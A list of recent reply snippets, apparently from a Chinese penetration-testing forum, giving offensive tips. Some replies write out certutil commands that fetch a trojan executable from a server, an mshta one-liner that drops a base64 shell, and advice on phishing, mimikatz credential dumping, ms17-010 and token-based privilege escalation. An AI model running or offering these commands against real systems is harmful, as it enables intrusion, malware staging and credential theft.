最新回复

  • 帖子作者
    回复
  • #883420

    这样你可以做个钓鱼,直接钓他明文密码可以解决这个问题

  • #883254

    http://admintony.com/UEditor-1-4-3-3-SSRF-AND-DNS-rebinding-attack.html

  • #883046

    whoami /priv看下权限,SeImpersonate、SeAssignPrimaryToken这两个是否开启,

  • #883090

    这个操作越来越骚了,一般都瞅不出来

  • #878190

    dnslog ping一下,或者certutil.exe -urlcache -split -f http://vps:ip/让它请求你。。就能获取到真实ip

  • #877674

    mshta vbscript:createobject("scripting.filesystemobject").createtextfile("1.txt",2,ture).writeline("base64")(window.close)certutil -decode 1.txt shell.txt

  • #876972

    你嘚知道是那个杀软吧,下载安装本地测试,就好了,

  • #874620

    你看下一是对jsp的某个字母拦截还是全部jsp在一起就拦截。。

  • #873349

    ..........

  • #873324

    看看root/.bash_history看看是啥tomcat之类锝就好办了。

  • #872764

    不断的收集机器密码然后去撞密码,打web,ms17-010,GPP,等等~~~

  • #872159

    克隆签名,也可以暂时达到几分钟的秒杀,不过对于提权的话应该够了

  • #872028

    都没有开启所需的权限怎么提权,

  • #868629

    找路径:for /r E:\ %i in (main.jsp) do @echo %i下载马执行上线:certutil.exe -urlcache -split -f http://127.0.0.1/mm.exe

  • #866564

    找到作者的博客,不知道是否是文章中所提供的字典:https://pwn.dog/2018/11/24/jd-class/#more

  • #865672

    你。。。是个伟人。

  • #863727

    mssql是否支持外链,支持的话可以sqlmap --password读取一下然后解密连接。

  • #863739

    回复 5# G0mini 啥报错呢??

  • #871739

    第一条用的比较多点,往往能找到绝对路径或者一大堆配置信息

  • #862228

    procdump+mimikaz呢????

Top ↑